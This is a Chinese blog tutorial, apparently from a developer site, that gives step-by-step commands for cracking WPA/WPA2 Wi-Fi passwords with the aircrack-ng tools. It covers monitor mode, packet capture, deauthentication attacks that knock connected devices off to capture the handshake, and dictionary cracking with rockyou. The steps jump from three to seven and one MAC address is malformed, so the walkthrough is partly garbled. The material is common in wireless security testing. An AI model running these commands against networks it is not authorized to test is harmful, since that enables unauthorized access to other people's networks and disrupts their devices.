WPA PSK 无线攻击流程

本文详细介绍如何使用airmon-ng、airodump-ng、aireplay-ng和aircrack-ng等工具,将无线网卡设置为Monitor模式,捕获并保存数据包,通过发送解除认证数据包获取四次握手信息,最终使用密码字典破解WPA/WPA2无线网络密码。

开发板推荐:天空星STM32F407VET6开发板

超高性价比 STM32主控 | 超高主频 | 一板兼容百芯 | 比赛神器 | 沉金彩色丝印

第一步:进入Monitor 模式

airmon-ng   #查看当前使用无线网卡

airmon-ng check #查看可能影响无线扫描的进程

airmon-ng check kill #关闭有可能影响无线扫描的进程

airmon-ng start wlan0 #使用wlan0 进入Monitor模式

使用 iwconfig 命令 查看 wlanmon的 Mode项是否切换为Monitor模式

第二步:启动抓包并保存数据包

airodump-ng wlan0mon -c 1 --bssid 00:11:22:33:44:55 -w wpa #--bssid 监听指定MAC的设备 -c 是指定信道 -w 把监听的数据包写入文件

第三步:Deauthentication 抓取XOR文件(有无线设备已经连接上路由器)

发送解除数据包打断现在与AP(路由器)连接的设备(手机,笔记本等),让设备再次重新连接

aireplay-ng -0 1 -a EC:26:CADC:29:B6 -c 68:3E:34:30:0F:AA wlan0mon# -0打断指令  1 进行一次尝试 -a 路由器的mac  -c要断开的无线设备MAC地址 wlan0mon 使用的无线网卡

出现 handshake说明成功获取四次握手信息:

第七步:使用密码字典进行攻击(可用kali自带,也可用网上下载或者自己组合生成的字典)

aircrack-ng -w /usr/share/john/password.lst wpa-01.cap   # -w 使用的字典 

/usr/share/wordlist 里面有一个比较大的字典(一千多万个密码):rockyou.txt.gz,可解压后用

最后得出密码:

 

 

开发板推荐:天空星STM32F407VET6开发板

超高性价比 STM32主控 | 超高主频 | 一板兼容百芯 | 比赛神器 | 沉金彩色丝印

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值